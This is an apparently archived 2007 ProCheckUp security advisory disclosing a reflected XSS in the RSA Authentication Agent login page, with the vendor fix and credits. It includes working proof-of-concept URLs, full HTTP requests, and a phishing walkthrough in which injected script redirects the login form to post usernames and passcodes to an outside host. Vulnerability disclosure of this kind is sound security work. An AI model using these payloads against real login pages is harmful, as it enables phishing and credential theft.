AOH :: HP Unsorted R :: BX2930.HTM

RSA Authentication Agent login page XSS



PR07-44: XSS on RSA Authentication Agent login page
PR07-44: XSS on RSA Authentication Agent login page



-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

PR07-44: XSS on RSA Authentication Agent login page

Vulnerability found: 5th December 2007

Vendor informed: 13th December 2007

Severity: Medium-high

Successfully tested on: RSA Authentication Agent 5.3.0.258 for Web for
Internet Information Services


Description:

RSA Authentication Agent is vulnerable to a vanilla XSS on the login page.

Vulnerable server-side script: '/WebID/IISWebAgentIF.dll'

Unfiltered parameter: 'postdata'


Notes:

It is believed that this vulnerability was originally reported in 2005
(BID 13168). However, In the original report, only version 5.2 of the
Authentication Agent was mentioned to be vulnerable. Additionally,
nothing was said regarding the possibility of exploiting this XSS as a
GET request (as opposed to POST). Therefore, the vulnerability can be
exploited via a malicious URL, since visiting a URL results in the web
browser submitting a GET request. Since the XSS condition occurs on the
login page, the bug is highly suitable for advanced XSS phishing attacks
as illustrated in the proof of concept below. Please note that this is
issue is different from CAN-2003-0389 and CVE-2005-3329.


Simple XSS Proof of Concept (PoC) URLs:

https://target-domain.foo/WebID/IISWebAgentIF.dll?stage=useridandpasscode&referrer=Z2F&sessionid=0&postdata=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3Ca%20b=%22&authntype=2&username=test&passcode=test

https://target-domain.foo/WebID/IISWebAgentIF.dll?stage=useridandpasscode&referrer=Z2F&sessionid=0&postdata=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3Ca%20b=%22


The injected payload in the previous examples is:
">https://target-domain.foo/WebID/IISWebAgentIF.dll?stage=useridandpasscode&referrer=Z2F&sessionid=0&postdata=%22%3E%3Cscript%3Edocument.forms[0].action=%22http://procheckup.com?%22%3C/script%3E%3Ca%20b=%22&authntype=2&username=anyvaluehere&passcode=anyvaluehere 

https://target-domain.foo/WebID/IISWebAgentIF.dll?stage=useridandpasscode&referrer=Z2F&sessionid=0&postdata=%22%3E%3Cscript%3Edocument.forms[0].action=%22http://procheckup.com?%22%3C/script%3E%3Ca%20b=%22 


The injected payload in the previous examples is:
"> b=" 


Consequences:

An attacker may be able to cause execution of malicious scripting code
in the browser of a victim user who clicks on a link to a RSA
Authentication Agent login page. Such code would run within the context
of the target domain.

This type of attack can result in non-persistent defacement of the
target site, or the redirection of confidential information (i.e.:
session IDs or passwords) to unauthorised third parties.


Fix:

The vendor has stated that this issue was addressed in the RSA
Authentication Agent 5.3.3.378. RSA customers can download the upgrade
from the RSA web site.


References:

http://www.procheckup.com/Vulnerability_2007.php 
http://www.rsa.com/node.aspx?id=2807 


Credits: found by Jan Fry and Adrian Pastor - ProCheckUp Ltd
(www.procheckup.com). ProCheckUp thanks RSA for being so cooperative and 
responding so fast.

COMPLETE HTTP REQUEST for simple XSS PoC:

GET
/WebID/IISWebAgentIF.dll?stage=useridandpasscode&referrer=Z2F&sessionid=0&postdata=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3Ca%20b=%22
HTTP/1.1
User-Agent: curl/7.15.4 (i486-pc-linux-gnu) libcurl/7.15.4
OpenSSL/0.9.8b zlib/1.2.3 libidn/0.6.3
Host: target-domain.foo
Accept: */*


PARTIAL HTTP RESPONSE (payload is returned after the 'postdata' tag):

HTTP/1.1 200 OK
Connection: close
Expires: 0
Date: Wed, 12 Dec 2007 17:32:08 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Pragma: no-cache
Cache-control: no-cache,max-age=0,must-revalidate




~  RSA SecurID : Log In

[ SNIP ]







User ID:
Passcode:
Your Passcode is your PIN + the number displayed on your token (the Tokencode).

COMPLETE ATTACK WALK-THROUGH FOR XSS PHISHING ATTACK: Step 1: Victim is tricked to click on the specially-crafted URL: HTTP Request: GET /WebID/IISWebAgentIF.dll?stage=useridandpasscode&referrer=Z2F&sessionid=0&postdata=%22%3E%3Cscript%3Edocument.forms[0].action=%22http: //procheckup.com?%22%3C/script%3E%3Ca%20b=%22 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-ms-application, application/vnd.ms-xpsdocument, application/xaml+xml, application/x-ms-xbap, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Accept-Language: en-gb UA-CPU: x86 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; .NET CLR 1.1.4322) Host: target-domain.foo Connection: Keep-Alive Step 2: Victim fills in 'User ID' and 'Passcode' fields and clicks on "Log In": HTTP request - notice the victim's username and passcode are submitted to a third-party site (procheckup.com in this case): POST http: //procheckup.com/? HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-ms-application, application/vnd.ms-xpsdocument, application/xaml+xml, application/x-ms-xbap, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Accept-Language: en-gb Content-Type: application/x-www-form-urlencoded UA-CPU: x86 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; .NET CLR 1.1.4322) Host: procheckup.com Content-Length: 116 Proxy-Connection: Keep-Alive Pragma: no-cache Cookie: __utma=105825218.1973702853.1197971766.1197981134.1197988777.4; __utmz=105825218.1197971766.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utmb=105825218 stage=useridandpasscode&referrer=%2F&sessionid=0&postdata=&authntype=2&username=MYUSERNAME&passcode=MYSECRETPASSWORD Legal: Copyright 2008 Procheckup Ltd. All rights reserved. Permission is granted for copying and circulating this Bulletin to the Internet community for the purpose of alerting them to problems, if and only if, the Bulletin is not edited or changed in any way, is attributed to Procheckup, and provided such reproduction and/or distribution is performed for non-commercial purposes. Any other use of this information is prohibited. Procheckup is not liable for any misuse of this information by any third party. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) iD8DBQFID2tsoR/Hvsj3i8sRAjgRAKC0Lvl/ZeP+UpIV4XZA4z4Tvt7lhwCgsU2J K7gMj25WIPIyHr1rDsbuSAA=fLsl -----END PGP SIGNATURE-----

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.